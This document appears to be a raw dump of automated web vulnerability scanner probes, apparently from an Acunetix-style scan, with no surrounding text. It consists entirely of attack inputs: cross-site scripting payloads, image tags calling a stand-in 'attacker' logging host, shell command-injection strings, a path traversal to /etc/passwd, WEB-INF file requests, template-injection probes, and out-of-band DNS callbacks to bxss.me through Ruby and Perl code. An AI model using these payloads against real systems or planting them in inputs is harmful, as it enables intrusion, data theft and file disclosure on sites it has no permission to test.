1'"()&%<zzz><ScRiPt >F5Qi(9874)</ScRiPt> 1<img sRc='http://attacker-9909/log.php? 1<input autofocus onfocus=824X(9183)> bfg9297%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9297 %31%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%79%77%56%58%28%39%32%32%37%34%29%22 1<img sRc='http://attacker-9658/log.php? PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9036'> 1"onmouseover=AF53(96092)" 1<aMWINnQ< |echo ynbjez$()\ jgdhvs\nz^xyu||a #' |echo ynbjez$()\ jgdhvs\nz^xyu||a #|" |echo ynbjez$()\ jgdhvs\nz^xyu||a # PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9023'> 1<ScRiPt >YXbu(9737)</ScRiPt> ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1<aAplc6W< response.write(9111513*9592409) /WEB-INF/web.xml ../pHqghUme '+'A'.concat(70-3).concat(22*4).concat(101).concat(80).concat(103).concat(87)+(require'socket' Socket.gethostbyname('hitzc'+'pjjzxwel98cc9.bxss.me.')[3].to_s)+' 1<W1WSZV>YIHH9[!+!]</W1WSZV> '.gethostbyname(lc('hitxw'.'qbtbgldobb466.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(81).chr(107).chr(90).' <th:t="${dfb}#foreach 1"sTYLe='zzz:Expre/**/SSion(RfYG(9872))'bad=" pHqghUme9753981 bfg10451%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10451 1<WRCD4Y>STH7N[!+!]</WRCD4Y> 19580100 1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%35%4F%6A%6E%28%39%32%38%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 1<isindex type=image src=1 onerror=ZWaV(9065)> 1"sTYLe='zzz:Expre/**/SSion(VkGj(9914))'bad=" 1<input autofocus onfocus=5Ojn(9285)>